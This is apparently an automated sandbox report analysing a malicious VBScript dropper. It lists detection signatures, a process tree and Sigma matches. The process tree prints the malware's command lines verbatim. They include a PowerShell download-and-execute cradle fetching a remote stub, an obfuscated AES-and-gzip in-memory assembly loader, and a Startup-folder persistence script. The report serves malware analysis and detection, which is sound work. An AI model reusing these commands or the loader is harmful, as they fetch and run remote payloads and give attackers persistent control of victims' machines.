Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
7299_output.vbs

Overview

General Information

Sample name:7299_output.vbs
Analysis ID:1573765
MD5:023ae408481fd04c22f2a161266b7182
SHA1:718f14dbeb0ff6b89a5189efe5e9cf940ba55d00
SHA256:422fcf5c6b60ba6118a539ab69901d4821ab1bc044543deb5f73673b2b8f4e65
Tags:emptyservices-xyzvbsuser-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: Drops script at startup location
VBScript performs obfuscated calls to suspicious functions
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to many ports of the same IP (likely port scanning)
Performs DNS queries to domains with low reputation
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7532 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\7299_output.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 7580 cmdline: "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7636 cmdline: powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 7264 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\c.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3428 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\c.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 4268 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Local\Temp\c.bat';$NHES='ErLgzntrLgzryrLgzPorLgzinrLgztrLgz'.Replace('rLgz', ''),'CHprLhHprLanHprLgeEHprLxtHprLensHprLionHprL'.Replace('HprL', ''),'CrvvlOevvlOavvlOtevvlODevvlOcrvvlOyvvlOptvvlOorvvlO'.Replace('vvlO', ''),'RemtKNamtKNdLmtKNinmtKNesmtKN'.Replace('mtKN', ''),'SptlAblittlAb'.Replace('tlAb', ''),'MaiShffnShffMoShffdShffulShffeShff'.Replace('Shff', ''),'GetKIgbCKIgburKIgbrKIgbenKIgbtPrKIgboKIgbceKIgbssKIgb'.Replace('KIgb', ''),'DecCIZVomCIZVprCIZVessCIZV'.Replace('CIZV', ''),'FrotqyzmBtqyzasetqyz6tqyz4Stqyztrtqyzitqyzngtqyz'.Replace('tqyz', ''),'ThZggrhZgganshZggfohZggrhZggmFhZgginahZgglBlhZggochZggkhZgg'.Replace('hZgg', ''),'InUneOvoUneOkeUneO'.Replace('UneO', ''),'ElLHtjemeLHtjntLHtjALHtjtLHtj'.Replace('LHtj', ''),'LoaKqbadKqba'.Replace('Kqba', ''),'CoqGYmpyqGYmToqGYm'.Replace('qGYm', '');powershell -w hidden;function fyfwL($itxzH){$CuCRJ=[System.Security.Cryptography.Aes]::Create();$CuCRJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$CuCRJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$CuCRJ.Key=[System.Convert]::($NHES[8])('gdCIwM8MuMxo7da/mrtCyIbOUmXu2FksViNDT/cHSz8=');$CuCRJ.IV=[System.Convert]::($NHES[8])('gcSSwI2zcUs6f9nNUiiZ/Q==');$kPfFB=$CuCRJ.($NHES[2])();$bvXzm=$kPfFB.($NHES[9])($itxzH,0,$itxzH.Length);$kPfFB.Dispose();$CuCRJ.Dispose();$bvXzm;}function RmDOY($itxzH){$dolaJ=New-Object System.IO.MemoryStream(,$itxzH);$wpdCQ=New-Object System.IO.MemoryStream;$MfuWs=New-Object System.IO.Compression.GZipStream($dolaJ,[IO.Compression.CompressionMode]::($NHES[7]));$MfuWs.($NHES[13])($wpdCQ);$MfuWs.Dispose();$dolaJ.Dispose();$wpdCQ.Dispose();$wpdCQ.ToArray();}$iiIRz=[System.IO.File]::($NHES[3])([Console]::Title);$bZoFj=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 5).Substring(2))));$NLfYF=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 6).Substring(2))));[System.Reflection.Assembly]::($NHES[12])([byte[]]$NLfYF).($NHES[0]).($NHES[10])($null,$null);[System.Reflection.Assembly]::($NHES[12])([byte[]]$bZoFj).($NHES[0]).($NHES[10])($null,$null); " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 1436 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
          • powershell.exe (PID: 7184 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
          • cmd.exe (PID: 7272 cmdline: "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 7696 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 7672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • cmd.exe (PID: 7628 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd';$NHES='ErLgzntrLgzryrLgzPorLgzinrLgztrLgz'.Replace('rLgz', ''),'CHprLhHprLanHprLgeEHprLxtHprLensHprLionHprL'.Replace('HprL', ''),'CrvvlOevvlOavvlOtevvlODevvlOcrvvlOyvvlOptvvlOorvvlO'.Replace('vvlO', ''),'RemtKNamtKNdLmtKNinmtKNesmtKN'.Replace('mtKN', ''),'SptlAblittlAb'.Replace('tlAb', ''),'MaiShffnShffMoShffdShffulShffeShff'.Replace('Shff', ''),'GetKIgbCKIgburKIgbrKIgbenKIgbtPrKIgboKIgbceKIgbssKIgb'.Replace('KIgb', ''),'DecCIZVomCIZVprCIZVessCIZV'.Replace('CIZV', ''),'FrotqyzmBtqyzasetqyz6tqyz4Stqyztrtqyzitqyzngtqyz'.Replace('tqyz', ''),'ThZggrhZgganshZggfohZggrhZggmFhZgginahZgglBlhZggochZggkhZgg'.Replace('hZgg', ''),'InUneOvoUneOkeUneO'.Replace('UneO', ''),'ElLHtjemeLHtjntLHtjALHtjtLHtj'.Replace('LHtj', ''),'LoaKqbadKqba'.Replace('Kqba', ''),'CoqGYmpyqGYmToqGYm'.Replace('qGYm', '');powershell -w hidden;function fyfwL($itxzH){$CuCRJ=[System.Security.Cryptography.Aes]::Create();$CuCRJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$CuCRJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$CuCRJ.Key=[System.Convert]::($NHES[8])('gdCIwM8MuMxo7da/mrtCyIbOUmXu2FksViNDT/cHSz8=');$CuCRJ.IV=[System.Convert]::($NHES[8])('gcSSwI2zcUs6f9nNUiiZ/Q==');$kPfFB=$CuCRJ.($NHES[2])();$bvXzm=$kPfFB.($NHES[9])($itxzH,0,$itxzH.Length);$kPfFB.Dispose();$CuCRJ.Dispose();$bvXzm;}function RmDOY($itxzH){$dolaJ=New-Object System.IO.MemoryStream(,$itxzH);$wpdCQ=New-Object System.IO.MemoryStream;$MfuWs=New-Object System.IO.Compression.GZipStream($dolaJ,[IO.Compression.CompressionMode]::($NHES[7]));$MfuWs.($NHES[13])($wpdCQ);$MfuWs.Dispose();$dolaJ.Dispose();$wpdCQ.Dispose();$wpdCQ.ToArray();}$iiIRz=[System.IO.File]::($NHES[3])([Console]::Title);$bZoFj=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 5).Substring(2))));$NLfYF=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 6).Substring(2))));[System.Reflection.Assembly]::($NHES[12])([byte[]]$NLfYF).($NHES[0]).($NHES[10])($null,$null);[System.Reflection.Assembly]::($NHES[12])([byte[]]$bZoFj).($NHES[0]).($NHES[10])($null,$null); " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • powershell.exe (PID: 7584 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
                • powershell.exe (PID: 7852 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
        • timeout.exe (PID: 7860 cmdline: timeout /nobreak /t 1 MD5: 100065E21CFBBDE57CBA2838921F84D6)
  • cmd.exe (PID: 4928 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 8032 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1312 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd';$NHES='ErLgzntrLgzryrLgzPorLgzinrLgztrLgz'.Replace('rLgz', ''),'CHprLhHprLanHprLgeEHprLxtHprLensHprLionHprL'.Replace('HprL', ''),'CrvvlOevvlOavvlOtevvlODevvlOcrvvlOyvvlOptvvlOorvvlO'.Replace('vvlO', ''),'RemtKNamtKNdLmtKNinmtKNesmtKN'.Replace('mtKN', ''),'SptlAblittlAb'.Replace('tlAb', ''),'MaiShffnShffMoShffdShffulShffeShff'.Replace('Shff', ''),'GetKIgbCKIgburKIgbrKIgbenKIgbtPrKIgboKIgbceKIgbssKIgb'.Replace('KIgb', ''),'DecCIZVomCIZVprCIZVessCIZV'.Replace('CIZV', ''),'FrotqyzmBtqyzasetqyz6tqyz4Stqyztrtqyzitqyzngtqyz'.Replace('tqyz', ''),'ThZggrhZgganshZggfohZggrhZggmFhZgginahZgglBlhZggochZggkhZgg'.Replace('hZgg', ''),'InUneOvoUneOkeUneO'.Replace('UneO', ''),'ElLHtjemeLHtjntLHtjALHtjtLHtj'.Replace('LHtj', ''),'LoaKqbadKqba'.Replace('Kqba', ''),'CoqGYmpyqGYmToqGYm'.Replace('qGYm', '');powershell -w hidden;function fyfwL($itxzH){$CuCRJ=[System.Security.Cryptography.Aes]::Create();$CuCRJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$CuCRJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$CuCRJ.Key=[System.Convert]::($NHES[8])('gdCIwM8MuMxo7da/mrtCyIbOUmXu2FksViNDT/cHSz8=');$CuCRJ.IV=[System.Convert]::($NHES[8])('gcSSwI2zcUs6f9nNUiiZ/Q==');$kPfFB=$CuCRJ.($NHES[2])();$bvXzm=$kPfFB.($NHES[9])($itxzH,0,$itxzH.Length);$kPfFB.Dispose();$CuCRJ.Dispose();$bvXzm;}function RmDOY($itxzH){$dolaJ=New-Object System.IO.MemoryStream(,$itxzH);$wpdCQ=New-Object System.IO.MemoryStream;$MfuWs=New-Object System.IO.Compression.GZipStream($dolaJ,[IO.Compression.CompressionMode]::($NHES[7]));$MfuWs.($NHES[13])($wpdCQ);$MfuWs.Dispose();$dolaJ.Dispose();$wpdCQ.Dispose();$wpdCQ.ToArray();}$iiIRz=[System.IO.File]::($NHES[3])([Console]::Title);$bZoFj=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 5).Substring(2))));$NLfYF=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 6).Substring(2))));[System.Reflection.Assembly]::($NHES[12])([byte[]]$NLfYF).($NHES[0]).($NHES[10])($null,$null);[System.Reflection.Assembly]::($NHES[12])([byte[]]$bZoFj).($NHES[0]).($NHES[10])($null,$null); " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 5144 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 7932 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
      • timeout.exe (PID: 3264 cmdline: timeout /nobreak /t 1 MD5: 100065E21CFBBDE57CBA2838921F84D6)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: PowerShell Download and Execution Cradles
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })", CommandLine: "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\7299_output.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7532, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })", ProcessId: 7580, ProcessName: cmd.exe
Sigma detected: WScript or CScript Dropper
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\7299_output.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\7299_output.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\7299_output.vbs", ProcessId: 7532, ProcessName: wscript.exe
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })", CommandLine: powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7580, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })", ProcessId: 7636, ProcessName: powershell.exe
Sigma detected: PowerShell Web Download
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })", CommandLine: "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\7299_output.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7532, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })", ProcessId: 7580, ProcessName: cmd.exe
Sigma detected: Usage Of Web Request Commands And Cmdlets
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })", CommandLine: "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\7299_output.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7532, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })", ProcessId: 7580, ProcessName: cmd.exe
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\7299_output.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\7299_output.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\7299_output.vbs", ProcessId: 7532, ProcessName: wscript.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })", CommandLine: powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7580, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })", ProcessId: 7636, ProcessName: powershell.exe

Data Obfuscation

barindex
Sigma detected: Drops script at startup location
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1436, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.2% probability
Source: Binary string: \??\C:\Windows\dll\System.Core.pdbb%R source: powershell.exe, 0000001D.00000002.2782843714.0000020CF10FD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.Powershell.PSReadline.pdbpdbine.pdb source: powershell.exe, 00000014.00000002.2659859163.000001F3AE5B4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2659859163.000001F3AE5B4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: omation.pdbJ source: powershell.exe, 0000000D.00000002.2425636470.0000025C60164000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdb* source: powershell.exe, 00000014.00000002.2659859163.000001F3AE590000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdb7 source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FDFF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2423231482.0000025C5FDFF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2782843714.0000020CF10FD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2787244921.0000020CF1430000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2787244921.0000020CF1482000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb; source: powershell.exe, 0000001D.00000002.2782843714.0000020CF112E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadLine.PDB source: powershell.exe, 0000001D.00000002.2782843714.0000020CF112E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Core.pdbpdbore.pdb source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2782843714.0000020CF112E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000003.00000002.1764714970.000001D0F57E4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: omation.pdb\s' source: powershell.exe, 00000014.00000002.2662631561.000001F3AE856000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbx source: powershell.exe, 00000014.00000002.2659859163.000001F3AE590000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactivene.PDB source: powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.Powershell.PSReadline.pdb` source: powershell.exe, 00000014.00000002.2659859163.000001F3AE5B4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb00525341310004000001000100b5fc90e7027f67871e773a8fde8938c81dd402ba65b9201d60593e96c492651e889cc13f1415ebb53fac1131ae0bd333c5ee6021672d9718ea31a8aebd0da0072f25d87dba6fc90ffd598ed4da35e44c398c454307e8e33b8426143daec9f596836f97c8f74750e5975c64e2189f0 source: powershell.exe, 0000001D.00000002.2787244921.0000020CF1430000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\Z:\syscalls\amsi_trace64.amsi.csv.pdb source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: omation.pdb source: powershell.exe, 0000000D.00000002.2425636470.0000025C60164000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Powershell.PSReadline.pdb]%K source: powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sn.pdb source: powershell.exe, 00000014.00000002.2659859163.000001F3AE5B4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Powershell.PSReadline.pdbowW source: powershell.exe, 0000000D.00000002.2425636470.0000025C600F0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2659859163.000001F3AE5B4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2782843714.0000020CF10FD000.00000004.00000020.00020000.00000000.sdmp
